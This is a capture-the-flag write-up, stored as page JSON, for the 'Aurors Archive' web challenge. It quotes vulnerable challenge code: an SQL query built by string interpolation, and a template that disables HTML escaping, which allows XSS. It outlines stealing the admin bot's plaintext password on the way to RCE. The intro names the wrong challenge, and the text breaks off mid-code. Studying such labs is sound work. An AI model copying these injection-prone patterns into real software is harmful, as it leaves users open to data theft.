[{"data":1,"prerenderedAt":6362},["ShallowReactive",2],{"content-query-p8F6EJtSIv":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":7,"head":9,"body":30,"_type":6356,"_id":6357,"_source":6358,"_file":6359,"_stem":6360,"_extension":6361},"/writeups/aurors-archive","writeups",false,"","Aurors Archive",{"title":10,"description":11,"keywords":12,"slug":13,"image":14,"date":15,"meta":16},"Aurors Archive [UNINTENDED]","Aurors Archive writeup from Hack The Box - Cyber Apocalypse CTF 2025","web,xss,postgreSQL,RCE","aurors-archive","https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102251/writeups/cyber_apocalypse_2025.webp","2025-03-25",[17,19,21,22,24,26,27,28],{"og:description":18},"Aurors Archive writeup from Hack The Box - Cyber Apocalypse CTF 2025.",{"og:title":20},"Aurors Archive writeup [UNINTENDED]",{"og:image":14},{"og:type":23},"article",{"og:url":25},"https://owalid.com/writeups/aurors-archive",{"description":18},{"title":20},{"keywords":29},"web,xss,postgreSQL,RCE,hackthebox,htb,ctf",{"type":31,"children":32,"toc":6350},"root",[33,40,47,53,67,72,78,266,272,277,282,286,291,295,300,714,719,725,738,1058,1063,1180,1192,1196,1201,2043,2048,2145,2157,2335,2340,2344,2349,2354,2359,2553,2558,2562,2567,2687,2691,2695,2700,2821,2826,3260,3265,3431,3436,3440,3445,3450,3456,3461,3653,3668,3673,3702,3707,3712,3770,3782,3871,3900,3905,4788,4801,5079,5084,5089,6328,6340,6344],{"type":34,"tag":35,"props":36,"children":37},"element","h1",{"id":13},[38],{"type":39,"value":8},"text",{"type":34,"tag":41,"props":42,"children":44},"h2",{"id":43},"introduction",[45],{"type":39,"value":46},"Introduction",{"type":34,"tag":48,"props":49,"children":50},"p",{},[51],{"type":39,"value":52},"Batchcraft potions is a hard challenge from the Cyber Apocalypse CTF 2025.",{"type":34,"tag":48,"props":54,"children":55},{},[56,58,65],{"type":39,"value":57},"The goal of this challenge is to have a RCE on the server and read the flag with the binary 
",{"type":34,"tag":59,"props":60,"children":62},"code",{"className":61},[],[63],{"type":39,"value":64},"/readflag",{"type":39,"value":66},".",{"type":34,"tag":48,"props":68,"children":69},{},[70],{"type":39,"value":71},"We can see below the architecture of the challenge:",{"type":34,"tag":73,"props":74,"children":77},"custom-image",{"imgSrc":75,":width":76},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102366/writeups/aurors-archive/architecture.webp","330",[],{"type":34,"tag":79,"props":80,"children":81},"ul",{},[82,162,197,219,248],{"type":34,"tag":83,"props":84,"children":85},"li",{},[86,92,94],{"type":34,"tag":87,"props":88,"children":89},"strong",{},[90],{"type":39,"value":91},"User Pages",{"type":39,"value":93},":\n",{"type":34,"tag":79,"props":95,"children":96},{},[97,110,123,136,149],{"type":34,"tag":83,"props":98,"children":99},{},[100,102,108],{"type":39,"value":101},"Dashboard (",{"type":34,"tag":59,"props":103,"children":105},{"className":104},[],[106],{"type":39,"value":107},"dashboard.html",{"type":39,"value":109},"): Displays ongoing auctions.",{"type":34,"tag":83,"props":111,"children":112},{},[113,115,121],{"type":39,"value":114},"My Submissions (",{"type":34,"tag":59,"props":116,"children":118},{"className":117},[],[119],{"type":39,"value":120},"my_submissions.html",{"type":39,"value":122},"): Lists resources submitted by the user.",{"type":34,"tag":83,"props":124,"children":125},{},[126,128,134],{"type":39,"value":127},"My Bids (",{"type":34,"tag":59,"props":129,"children":131},{"className":130},[],[132],{"type":39,"value":133},"my_bids.html",{"type":39,"value":135},"): Lists auctions where the user has placed bids.",{"type":34,"tag":83,"props":137,"children":138},{},[139,141,147],{"type":39,"value":140},"Submit Resource (",{"type":34,"tag":59,"props":142,"children":144},{"className":143},[],[145],{"type":39,"value":146},"submit.html",{"type":39,"value":148},"): Allows submission of a new 
resource.",{"type":34,"tag":83,"props":150,"children":151},{},[152,154,160],{"type":39,"value":153},"Auction Details (",{"type":34,"tag":59,"props":155,"children":157},{"className":156},[],[158],{"type":39,"value":159},"auction_details.html",{"type":39,"value":161},"): Displays details of a specific auction.",{"type":34,"tag":83,"props":163,"children":164},{},[165,178,179],{"type":34,"tag":87,"props":166,"children":167},{},[168,170,176],{"type":39,"value":169},"REST API (",{"type":34,"tag":59,"props":171,"children":173},{"className":172},[],[174],{"type":39,"value":175},"routes/api.js",{"type":39,"value":177},")",{"type":39,"value":93},{"type":34,"tag":79,"props":180,"children":181},{},[182,187,192],{"type":34,"tag":83,"props":183,"children":184},{},[185],{"type":39,"value":186},"Authentication (login, OAuth).",{"type":34,"tag":83,"props":188,"children":189},{},[190],{"type":39,"value":191},"Management of submissions, auctions and bids.",{"type":34,"tag":83,"props":193,"children":194},{},[195],{"type":39,"value":196},"Integration with a Puppeteer bot to visit submitted URLs.",{"type":34,"tag":83,"props":198,"children":199},{},[200,205,206],{"type":34,"tag":87,"props":201,"children":202},{},[203],{"type":39,"value":204},"Database (db.js)",{"type":39,"value":93},{"type":34,"tag":79,"props":207,"children":208},{},[209,214],{"type":34,"tag":83,"props":210,"children":211},{},[212],{"type":39,"value":213},"PostgreSQL is used to store users, submissions, auctions and bids.",{"type":34,"tag":83,"props":215,"children":216},{},[217],{"type":39,"value":218},"Functions allow creating, reading, updating and deleting data.",{"type":34,"tag":83,"props":220,"children":221},{},[222,234,235],{"type":34,"tag":87,"props":223,"children":224},{},[225,227,233],{"type":39,"value":226},"Admin Panel 
(",{"type":34,"tag":59,"props":228,"children":230},{"className":229},[],[231],{"type":39,"value":232},"admin.html",{"type":39,"value":177},{"type":39,"value":93},{"type":34,"tag":79,"props":236,"children":237},{},[238,243],{"type":34,"tag":83,"props":239,"children":240},{},[241],{"type":39,"value":242},"Accessible only by the \"admin\" user.",{"type":34,"tag":83,"props":244,"children":245},{},[246],{"type":39,"value":247},"Allows viewing database tables.",{"type":34,"tag":83,"props":249,"children":250},{},[251,256,258],{"type":34,"tag":87,"props":252,"children":253},{},[254],{"type":39,"value":255},"Bot Puppeteer",{"type":39,"value":257}," :\n",{"type":34,"tag":79,"props":259,"children":260},{},[261],{"type":34,"tag":83,"props":262,"children":263},{},[264],{"type":39,"value":265},"Logs in as administrator to the site and visits submitted URLs to verify their content.",{"type":34,"tag":41,"props":267,"children":269},{"id":268},"admin-part",[270],{"type":39,"value":271},"Admin part",{"type":34,"tag":48,"props":273,"children":274},{},[275],{"type":39,"value":276},"We will see on this section the admin part of the website. 
We can change the password of the admin in the source code to better understand the challenge.",{"type":34,"tag":48,"props":278,"children":279},{},[280],{"type":39,"value":281},"We can see that once authenticated as admin, we have access to the admin section, where it is possible to read the database information.",{"type":34,"tag":73,"props":283,"children":285},{"imgSrc":284},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102572/writeups/aurors-archive/admin_preview.webp",[],{"type":34,"tag":48,"props":287,"children":288},{},[289],{"type":39,"value":290},"We can quickly see that the password field in the users table is not encrypted:",{"type":34,"tag":73,"props":292,"children":294},{"imgSrc":293},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102572/writeups/aurors-archive/users_table.webp",[],{"type":34,"tag":48,"props":296,"children":297},{},[298],{"type":39,"value":299},"Additionally, we can see in the route that retrieves the database information that there is an SQL injection present, we will examine this in the next section:",{"type":34,"tag":301,"props":302,"children":304},"code-card",{"lang":303},"js",[305],{"type":34,"tag":306,"props":307,"children":310},"pre",{"className":308,"code":309,"language":303,"meta":7,"style":7},"language-js shiki shiki-themes vitesse-dark","// New Endpoint: Get all records from a specified table (POST version)\nrouter.post(\"/table\", isAdmin, async (req, res) => {\n  const { tableName } = req.body;\n  try {\n    const query = `SELECT * FROM \"${tableName}\"`;\n\n    [..SNIP...]\n\n    const results = await runReadOnlyQuery(query);\n    res.json({ success: true, results });\n  }\n  [..SNIP...]\n  
\n});\n",[311],{"type":34,"tag":59,"props":312,"children":313},{"__ignoreMap":7},[314,326,421,469,483,539,549,568,576,617,669,678,695,705],{"type":34,"tag":315,"props":316,"children":319},"span",{"class":317,"line":318},"line",1,[320],{"type":34,"tag":315,"props":321,"children":323},{"style":322},"--shiki-default:#758575DD",[324],{"type":39,"value":325},"// New Endpoint: Get all records from a specified table (POST version)\n",{"type":34,"tag":315,"props":327,"children":329},{"class":317,"line":328},2,[330,336,341,347,352,358,364,368,373,378,382,388,393,398,402,407,411,416],{"type":34,"tag":315,"props":331,"children":333},{"style":332},"--shiki-default:#BD976A",[334],{"type":39,"value":335},"router",{"type":34,"tag":315,"props":337,"children":339},{"style":338},"--shiki-default:#666666",[340],{"type":39,"value":66},{"type":34,"tag":315,"props":342,"children":344},{"style":343},"--shiki-default:#80A665",[345],{"type":39,"value":346},"post",{"type":34,"tag":315,"props":348,"children":349},{"style":338},[350],{"type":39,"value":351},"(",{"type":34,"tag":315,"props":353,"children":355},{"style":354},"--shiki-default:#C98A7D77",[356],{"type":39,"value":357},"\"",{"type":34,"tag":315,"props":359,"children":361},{"style":360},"--shiki-default:#C98A7D",[362],{"type":39,"value":363},"/table",{"type":34,"tag":315,"props":365,"children":366},{"style":354},[367],{"type":39,"value":357},{"type":34,"tag":315,"props":369,"children":370},{"style":338},[371],{"type":39,"value":372},",",{"type":34,"tag":315,"props":374,"children":375},{"style":332},[376],{"type":39,"value":377}," isAdmin",{"type":34,"tag":315,"props":379,"children":380},{"style":338},[381],{"type":39,"value":372},{"type":34,"tag":315,"props":383,"children":385},{"style":384},"--shiki-default:#CB7676",[386],{"type":39,"value":387}," async",{"type":34,"tag":315,"props":389,"children":390},{"style":338},[391],{"type":39,"value":392}," 
(",{"type":34,"tag":315,"props":394,"children":395},{"style":332},[396],{"type":39,"value":397},"req",{"type":34,"tag":315,"props":399,"children":400},{"style":338},[401],{"type":39,"value":372},{"type":34,"tag":315,"props":403,"children":404},{"style":332},[405],{"type":39,"value":406}," res",{"type":34,"tag":315,"props":408,"children":409},{"style":338},[410],{"type":39,"value":177},{"type":34,"tag":315,"props":412,"children":413},{"style":338},[414],{"type":39,"value":415}," =>",{"type":34,"tag":315,"props":417,"children":418},{"style":338},[419],{"type":39,"value":420}," {\n",{"type":34,"tag":315,"props":422,"children":424},{"class":317,"line":423},3,[425,430,435,440,445,450,455,459,464],{"type":34,"tag":315,"props":426,"children":427},{"style":384},[428],{"type":39,"value":429},"  const",{"type":34,"tag":315,"props":431,"children":432},{"style":338},[433],{"type":39,"value":434}," {",{"type":34,"tag":315,"props":436,"children":437},{"style":332},[438],{"type":39,"value":439}," tableName",{"type":34,"tag":315,"props":441,"children":442},{"style":338},[443],{"type":39,"value":444}," }",{"type":34,"tag":315,"props":446,"children":447},{"style":338},[448],{"type":39,"value":449}," =",{"type":34,"tag":315,"props":451,"children":452},{"style":332},[453],{"type":39,"value":454}," req",{"type":34,"tag":315,"props":456,"children":457},{"style":338},[458],{"type":39,"value":66},{"type":34,"tag":315,"props":460,"children":461},{"style":332},[462],{"type":39,"value":463},"body",{"type":34,"tag":315,"props":465,"children":466},{"style":338},[467],{"type":39,"value":468},";\n",{"type":34,"tag":315,"props":470,"children":472},{"class":317,"line":471},4,[473,479],{"type":34,"tag":315,"props":474,"children":476},{"style":475},"--shiki-default:#4D9375",[477],{"type":39,"value":478},"  
try",{"type":34,"tag":315,"props":480,"children":481},{"style":338},[482],{"type":39,"value":420},{"type":34,"tag":315,"props":484,"children":486},{"class":317,"line":485},5,[487,492,497,501,506,511,516,521,526,530,535],{"type":34,"tag":315,"props":488,"children":489},{"style":384},[490],{"type":39,"value":491},"    const",{"type":34,"tag":315,"props":493,"children":494},{"style":332},[495],{"type":39,"value":496}," query",{"type":34,"tag":315,"props":498,"children":499},{"style":338},[500],{"type":39,"value":449},{"type":34,"tag":315,"props":502,"children":503},{"style":354},[504],{"type":39,"value":505}," `",{"type":34,"tag":315,"props":507,"children":508},{"style":360},[509],{"type":39,"value":510},"SELECT * FROM \"",{"type":34,"tag":315,"props":512,"children":513},{"style":475},[514],{"type":39,"value":515},"${",{"type":34,"tag":315,"props":517,"children":518},{"style":360},[519],{"type":39,"value":520},"tableName",{"type":34,"tag":315,"props":522,"children":523},{"style":475},[524],{"type":39,"value":525},"}",{"type":34,"tag":315,"props":527,"children":528},{"style":360},[529],{"type":39,"value":357},{"type":34,"tag":315,"props":531,"children":532},{"style":354},[533],{"type":39,"value":534},"`",{"type":34,"tag":315,"props":536,"children":537},{"style":338},[538],{"type":39,"value":468},{"type":34,"tag":315,"props":540,"children":542},{"class":317,"line":541},6,[543],{"type":34,"tag":315,"props":544,"children":546},{"emptyLinePlaceholder":545},true,[547],{"type":39,"value":548},"\n",{"type":34,"tag":315,"props":550,"children":552},{"class":317,"line":551},7,[553,558,563],{"type":34,"tag":315,"props":554,"children":555},{"style":338},[556],{"type":39,"value":557},"    
[..",{"type":34,"tag":315,"props":559,"children":560},{"style":332},[561],{"type":39,"value":562},"SNIP",{"type":34,"tag":315,"props":564,"children":565},{"style":338},[566],{"type":39,"value":567},"...]\n",{"type":34,"tag":315,"props":569,"children":571},{"class":317,"line":570},8,[572],{"type":34,"tag":315,"props":573,"children":574},{"emptyLinePlaceholder":545},[575],{"type":39,"value":548},{"type":34,"tag":315,"props":577,"children":579},{"class":317,"line":578},9,[580,584,589,593,598,603,607,612],{"type":34,"tag":315,"props":581,"children":582},{"style":384},[583],{"type":39,"value":491},{"type":34,"tag":315,"props":585,"children":586},{"style":332},[587],{"type":39,"value":588}," results",{"type":34,"tag":315,"props":590,"children":591},{"style":338},[592],{"type":39,"value":449},{"type":34,"tag":315,"props":594,"children":595},{"style":475},[596],{"type":39,"value":597}," await",{"type":34,"tag":315,"props":599,"children":600},{"style":343},[601],{"type":39,"value":602}," runReadOnlyQuery",{"type":34,"tag":315,"props":604,"children":605},{"style":338},[606],{"type":39,"value":351},{"type":34,"tag":315,"props":608,"children":609},{"style":332},[610],{"type":39,"value":611},"query",{"type":34,"tag":315,"props":613,"children":614},{"style":338},[615],{"type":39,"value":616},");\n",{"type":34,"tag":315,"props":618,"children":620},{"class":317,"line":619},10,[621,626,630,635,640,646,651,656,660,664],{"type":34,"tag":315,"props":622,"children":623},{"style":332},[624],{"type":39,"value":625},"    res",{"type":34,"tag":315,"props":627,"children":628},{"style":338},[629],{"type":39,"value":66},{"type":34,"tag":315,"props":631,"children":632},{"style":343},[633],{"type":39,"value":634},"json",{"type":34,"tag":315,"props":636,"children":637},{"style":338},[638],{"type":39,"value":639},"({",{"type":34,"tag":315,"props":641,"children":643},{"style":642},"--shiki-default:#B8A965",[644],{"type":39,"value":645}," 
success",{"type":34,"tag":315,"props":647,"children":648},{"style":338},[649],{"type":39,"value":650},":",{"type":34,"tag":315,"props":652,"children":653},{"style":475},[654],{"type":39,"value":655}," true",{"type":34,"tag":315,"props":657,"children":658},{"style":338},[659],{"type":39,"value":372},{"type":34,"tag":315,"props":661,"children":662},{"style":332},[663],{"type":39,"value":588},{"type":34,"tag":315,"props":665,"children":666},{"style":338},[667],{"type":39,"value":668}," });\n",{"type":34,"tag":315,"props":670,"children":672},{"class":317,"line":671},11,[673],{"type":34,"tag":315,"props":674,"children":675},{"style":338},[676],{"type":39,"value":677},"  }\n",{"type":34,"tag":315,"props":679,"children":681},{"class":317,"line":680},12,[682,687,691],{"type":34,"tag":315,"props":683,"children":684},{"style":338},[685],{"type":39,"value":686},"  [..",{"type":34,"tag":315,"props":688,"children":689},{"style":332},[690],{"type":39,"value":562},{"type":34,"tag":315,"props":692,"children":693},{"style":338},[694],{"type":39,"value":567},{"type":34,"tag":315,"props":696,"children":698},{"class":317,"line":697},13,[699],{"type":34,"tag":315,"props":700,"children":702},{"style":701},"--shiki-default:#DBD7CAEE",[703],{"type":39,"value":704},"  \n",{"type":34,"tag":315,"props":706,"children":708},{"class":317,"line":707},14,[709],{"type":34,"tag":315,"props":710,"children":711},{"style":338},[712],{"type":39,"value":713},"});\n",{"type":34,"tag":48,"props":715,"children":716},{},[717],{"type":39,"value":718},"The idea now would be to use the bot to retrieve the unencrypted admin password in order to then exploit the SQL injection",{"type":34,"tag":41,"props":720,"children":722},{"id":721},"xss-unintended",[723],{"type":39,"value":724},"XSS [UNINTENDED]",{"type":34,"tag":48,"props":726,"children":727},{},[728,730,736],{"type":39,"value":729},"To execute actions on the bot, we need a primitive that would allow us to execute code on the bot's browser, in other words, 
an XSS. We can see in the route that displays the auctions that the keyword ",{"type":34,"tag":59,"props":731,"children":733},{"className":732},[],[734],{"type":39,"value":735},"safe",{"type":39,"value":737}," is used in the data-auction attribute.",{"type":34,"tag":301,"props":739,"children":741},{"lang":740},"html",[742],{"type":34,"tag":306,"props":743,"children":746},{"className":744,"code":745,"language":740,"meta":7,"style":7},"language-html shiki shiki-themes vitesse-dark","{% extends \"layout.html\" %}\n\n{% block content %}\n\u003C!-- Pass the auction data as a JSON string via a data attribute -->\n\u003Cdiv id=\"auction-details-panel\" class=\"rpg-panel\" data-auction='{{ auction | dump | safe }}'> \u003C!-- \u003C-- INJECTION -->\n  \u003Cdiv class=\"panel-header\">\n    \u003Ci class=\"fa-solid fa-gavel\">\u003C/i>\n    \u003Ch2 class=\"panel-title\">Auction Details\u003C/h2>\n  \u003C/div>\n  [...SNIP...]\n\u003C/div>\n{% endblock %}\n",[747],{"type":34,"tag":59,"props":748,"children":749},{"__ignoreMap":7},[750,758,765,773,781,872,910,957,1011,1027,1035,1050],{"type":34,"tag":315,"props":751,"children":752},{"class":317,"line":318},[753],{"type":34,"tag":315,"props":754,"children":755},{"style":701},[756],{"type":39,"value":757},"{% extends \"layout.html\" %}\n",{"type":34,"tag":315,"props":759,"children":760},{"class":317,"line":328},[761],{"type":34,"tag":315,"props":762,"children":763},{"emptyLinePlaceholder":545},[764],{"type":39,"value":548},{"type":34,"tag":315,"props":766,"children":767},{"class":317,"line":423},[768],{"type":34,"tag":315,"props":769,"children":770},{"style":701},[771],{"type":39,"value":772},"{% block content %}\n",{"type":34,"tag":315,"props":774,"children":775},{"class":317,"line":471},[776],{"type":34,"tag":315,"props":777,"children":778},{"style":322},[779],{"type":39,"value":780},"\u003C!-- Pass the auction data as a JSON string via a data attribute 
-->\n",{"type":34,"tag":315,"props":782,"children":783},{"class":317,"line":485},[784,789,794,799,804,808,813,817,822,826,830,835,839,844,848,853,858,862,867],{"type":34,"tag":315,"props":785,"children":786},{"style":338},[787],{"type":39,"value":788},"\u003C",{"type":34,"tag":315,"props":790,"children":791},{"style":475},[792],{"type":39,"value":793},"div",{"type":34,"tag":315,"props":795,"children":796},{"style":332},[797],{"type":39,"value":798}," id",{"type":34,"tag":315,"props":800,"children":801},{"style":338},[802],{"type":39,"value":803},"=",{"type":34,"tag":315,"props":805,"children":806},{"style":354},[807],{"type":39,"value":357},{"type":34,"tag":315,"props":809,"children":810},{"style":360},[811],{"type":39,"value":812},"auction-details-panel",{"type":34,"tag":315,"props":814,"children":815},{"style":354},[816],{"type":39,"value":357},{"type":34,"tag":315,"props":818,"children":819},{"style":332},[820],{"type":39,"value":821}," class",{"type":34,"tag":315,"props":823,"children":824},{"style":338},[825],{"type":39,"value":803},{"type":34,"tag":315,"props":827,"children":828},{"style":354},[829],{"type":39,"value":357},{"type":34,"tag":315,"props":831,"children":832},{"style":360},[833],{"type":39,"value":834},"rpg-panel",{"type":34,"tag":315,"props":836,"children":837},{"style":354},[838],{"type":39,"value":357},{"type":34,"tag":315,"props":840,"children":841},{"style":332},[842],{"type":39,"value":843}," data-auction",{"type":34,"tag":315,"props":845,"children":846},{"style":338},[847],{"type":39,"value":803},{"type":34,"tag":315,"props":849,"children":850},{"style":354},[851],{"type":39,"value":852},"'",{"type":34,"tag":315,"props":854,"children":855},{"style":360},[856],{"type":39,"value":857},"{{ auction | dump | safe 
}}",{"type":34,"tag":315,"props":859,"children":860},{"style":354},[861],{"type":39,"value":852},{"type":34,"tag":315,"props":863,"children":864},{"style":338},[865],{"type":39,"value":866},">",{"type":34,"tag":315,"props":868,"children":869},{"style":322},[870],{"type":39,"value":871}," \u003C!-- \u003C-- INJECTION -->\n",{"type":34,"tag":315,"props":873,"children":874},{"class":317,"line":541},[875,880,884,888,892,896,901,905],{"type":34,"tag":315,"props":876,"children":877},{"style":338},[878],{"type":39,"value":879},"  \u003C",{"type":34,"tag":315,"props":881,"children":882},{"style":475},[883],{"type":39,"value":793},{"type":34,"tag":315,"props":885,"children":886},{"style":332},[887],{"type":39,"value":821},{"type":34,"tag":315,"props":889,"children":890},{"style":338},[891],{"type":39,"value":803},{"type":34,"tag":315,"props":893,"children":894},{"style":354},[895],{"type":39,"value":357},{"type":34,"tag":315,"props":897,"children":898},{"style":360},[899],{"type":39,"value":900},"panel-header",{"type":34,"tag":315,"props":902,"children":903},{"style":354},[904],{"type":39,"value":357},{"type":34,"tag":315,"props":906,"children":907},{"style":338},[908],{"type":39,"value":909},">\n",{"type":34,"tag":315,"props":911,"children":912},{"class":317,"line":551},[913,918,923,927,931,935,940,944,949,953],{"type":34,"tag":315,"props":914,"children":915},{"style":338},[916],{"type":39,"value":917},"    \u003C",{"type":34,"tag":315,"props":919,"children":920},{"style":475},[921],{"type":39,"value":922},"i",{"type":34,"tag":315,"props":924,"children":925},{"style":332},[926],{"type":39,"value":821},{"type":34,"tag":315,"props":928,"children":929},{"style":338},[930],{"type":39,"value":803},{"type":34,"tag":315,"props":932,"children":933},{"style":354},[934],{"type":39,"value":357},{"type":34,"tag":315,"props":936,"children":937},{"style":360},[938],{"type":39,"value":939},"fa-solid 
fa-gavel",{"type":34,"tag":315,"props":941,"children":942},{"style":354},[943],{"type":39,"value":357},{"type":34,"tag":315,"props":945,"children":946},{"style":338},[947],{"type":39,"value":948},">\u003C/",{"type":34,"tag":315,"props":950,"children":951},{"style":475},[952],{"type":39,"value":922},{"type":34,"tag":315,"props":954,"children":955},{"style":338},[956],{"type":39,"value":909},{"type":34,"tag":315,"props":958,"children":959},{"class":317,"line":570},[960,964,968,972,976,980,985,989,993,998,1003,1007],{"type":34,"tag":315,"props":961,"children":962},{"style":338},[963],{"type":39,"value":917},{"type":34,"tag":315,"props":965,"children":966},{"style":475},[967],{"type":39,"value":41},{"type":34,"tag":315,"props":969,"children":970},{"style":332},[971],{"type":39,"value":821},{"type":34,"tag":315,"props":973,"children":974},{"style":338},[975],{"type":39,"value":803},{"type":34,"tag":315,"props":977,"children":978},{"style":354},[979],{"type":39,"value":357},{"type":34,"tag":315,"props":981,"children":982},{"style":360},[983],{"type":39,"value":984},"panel-title",{"type":34,"tag":315,"props":986,"children":987},{"style":354},[988],{"type":39,"value":357},{"type":34,"tag":315,"props":990,"children":991},{"style":338},[992],{"type":39,"value":866},{"type":34,"tag":315,"props":994,"children":995},{"style":701},[996],{"type":39,"value":997},"Auction Details",{"type":34,"tag":315,"props":999,"children":1000},{"style":338},[1001],{"type":39,"value":1002},"\u003C/",{"type":34,"tag":315,"props":1004,"children":1005},{"style":475},[1006],{"type":39,"value":41},{"type":34,"tag":315,"props":1008,"children":1009},{"style":338},[1010],{"type":39,"value":909},{"type":34,"tag":315,"props":1012,"children":1013},{"class":317,"line":578},[1014,1019,1023],{"type":34,"tag":315,"props":1015,"children":1016},{"style":338},[1017],{"type":39,"value":1018},"  
\u003C/",{"type":34,"tag":315,"props":1020,"children":1021},{"style":475},[1022],{"type":39,"value":793},{"type":34,"tag":315,"props":1024,"children":1025},{"style":338},[1026],{"type":39,"value":909},{"type":34,"tag":315,"props":1028,"children":1029},{"class":317,"line":619},[1030],{"type":34,"tag":315,"props":1031,"children":1032},{"style":701},[1033],{"type":39,"value":1034},"  [...SNIP...]\n",{"type":34,"tag":315,"props":1036,"children":1037},{"class":317,"line":671},[1038,1042,1046],{"type":34,"tag":315,"props":1039,"children":1040},{"style":338},[1041],{"type":39,"value":1002},{"type":34,"tag":315,"props":1043,"children":1044},{"style":475},[1045],{"type":39,"value":793},{"type":34,"tag":315,"props":1047,"children":1048},{"style":338},[1049],{"type":39,"value":909},{"type":34,"tag":315,"props":1051,"children":1052},{"class":317,"line":680},[1053],{"type":34,"tag":315,"props":1054,"children":1055},{"style":701},[1056],{"type":39,"value":1057},"{% endblock %}\n",{"type":34,"tag":48,"props":1059,"children":1060},{},[1061],{"type":39,"value":1062},"We will explain in more detail why the injection is possible:",{"type":34,"tag":79,"props":1064,"children":1065},{},[1066,1088,1123],{"type":34,"tag":83,"props":1067,"children":1068},{},[1069,1078,1080,1086],{"type":34,"tag":87,"props":1070,"children":1071},{},[1072],{"type":34,"tag":59,"props":1073,"children":1075},{"className":1074},[],[1076],{"type":39,"value":1077},"{{ auction }}",{"type":39,"value":1079},": Injects the ",{"type":34,"tag":59,"props":1081,"children":1083},{"className":1082},[],[1084],{"type":39,"value":1085},"auction",{"type":39,"value":1087}," variable into the template.",{"type":34,"tag":83,"props":1089,"children":1090},{},[1091,1100,1102,1107,1109,1114,1116,1122],{"type":34,"tag":87,"props":1092,"children":1093},{},[1094],{"type":34,"tag":59,"props":1095,"children":1097},{"className":1096},[],[1098],{"type":39,"value":1099},"dump",{"type":39,"value":1101},": Serializes 
",{"type":34,"tag":59,"props":1103,"children":1105},{"className":1104},[],[1106],{"type":39,"value":1085},{"type":39,"value":1108}," to ",{"type":34,"tag":87,"props":1110,"children":1111},{},[1112],{"type":39,"value":1113},"JSON",{"type":39,"value":1115},". It's like ",{"type":34,"tag":59,"props":1117,"children":1119},{"className":1118},[],[1120],{"type":39,"value":1121},"JSON.stringify(auction)",{"type":39,"value":66},{"type":34,"tag":83,"props":1124,"children":1125},{},[1126,1135,1137,1142,1144,1149,1151,1156,1158,1164,1166,1172,1174],{"type":34,"tag":87,"props":1127,"children":1128},{},[1129],{"type":34,"tag":59,"props":1130,"children":1132},{"className":1131},[],[1133],{"type":39,"value":1134},"safe",{"type":39,"value":1136},": Indicates that the content is \"safe\" and ",{"type":34,"tag":87,"props":1138,"children":1139},{},[1140],{"type":39,"value":1141},"prevents HTML escaping",{"type":39,"value":1143},". Without ",{"type":34,"tag":59,"props":1145,"children":1147},{"className":1146},[],[1148],{"type":39,"value":1134},{"type":39,"value":1150},", the ",{"type":34,"tag":59,"props":1152,"children":1154},{"className":1153},[],[1155],{"type":39,"value":357},{"type":39,"value":1157}," and ",{"type":34,"tag":59,"props":1159,"children":1161},{"className":1160},[],[1162],{"type":39,"value":1163},"&lt;",{"type":39,"value":1165}," would be transformed to ",{"type":34,"tag":59,"props":1167,"children":1169},{"className":1168},[],[1170],{"type":39,"value":1171},"&quot;",{"type":39,"value":1173}," or ",{"type":34,"tag":59,"props":1175,"children":1177},{"className":1176},[],[1178],{"type":39,"value":1179},"&l",{"type":34,"tag":48,"props":1181,"children":1182},{},[1183,1185,1190],{"type":39,"value":1184},"By analyzing the injection, we can easily guess that it's possible to break the HTML by adding a ",{"type":34,"tag":59,"props":1186,"children":1188},{"className":1187},[],[1189],{"type":39,"value":852},{"type":39,"value":1191}," which will make us escape the tag. 
However, if we try to inject an XSS payload, we get an error returned by the server indicating that our input is too long",{"type":34,"tag":73,"props":1193,"children":1195},{"imgSrc":1194},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743103061/writeups/aurors-archive/to_long_error.webp",[],{"type":34,"tag":48,"props":1197,"children":1198},{},[1199],{"type":39,"value":1200},"By analyzing in more detail why this error occurs, we can see that a size check is performed in the backend code.",{"type":34,"tag":301,"props":1202,"children":1203},{"lang":303},[1204],{"type":34,"tag":306,"props":1205,"children":1207},{"className":308,"code":1206,"language":303,"meta":7,"style":7},"router.post('/auctions/:id/bids', isAuthenticated, async (req, res) => {\n  try {\n    const auctionId = req.params.id;\n    const userId = req.session.userId;\n    const { bid } = req.body;\n\n    if (bid.length > 10) { // \u003C-- CHECK THE LENGTH\n      return res.status(400).json({ success: false, message: 'Too long' });\n    }\n    await placeBid(auctionId, userId, bid);\n    return res.json({ success: true });\n  } catch (err) {\n    console.error('Error placing bid:', err);\n    const status = err.message.includes('Invalid') ? 400\n                  : (err.message.includes('not found') || err.message.includes('closed')) ? 404\n                  : 500;\n    return res.status(status).json({ success: false, message: err.message || 'Internal server error.' 
});\n  }\n});\n",[1208],{"type":34,"tag":59,"props":1209,"children":1210},{"__ignoreMap":7},[1211,1288,1299,1341,1383,1423,1430,1480,1567,1575,1617,1657,1687,1734,1803,1913,1930,2027,2035],{"type":34,"tag":315,"props":1212,"children":1213},{"class":317,"line":318},[1214,1218,1222,1226,1230,1234,1239,1243,1247,1252,1256,1260,1264,1268,1272,1276,1280,1284],{"type":34,"tag":315,"props":1215,"children":1216},{"style":332},[1217],{"type":39,"value":335},{"type":34,"tag":315,"props":1219,"children":1220},{"style":338},[1221],{"type":39,"value":66},{"type":34,"tag":315,"props":1223,"children":1224},{"style":343},[1225],{"type":39,"value":346},{"type":34,"tag":315,"props":1227,"children":1228},{"style":338},[1229],{"type":39,"value":351},{"type":34,"tag":315,"props":1231,"children":1232},{"style":354},[1233],{"type":39,"value":852},{"type":34,"tag":315,"props":1235,"children":1236},{"style":360},[1237],{"type":39,"value":1238},"/auctions/:id/bids",{"type":34,"tag":315,"props":1240,"children":1241},{"style":354},[1242],{"type":39,"value":852},{"type":34,"tag":315,"props":1244,"children":1245},{"style":338},[1246],{"type":39,"value":372},{"type":34,"tag":315,"props":1248,"children":1249},{"style":332},[1250],{"type":39,"value":1251}," 
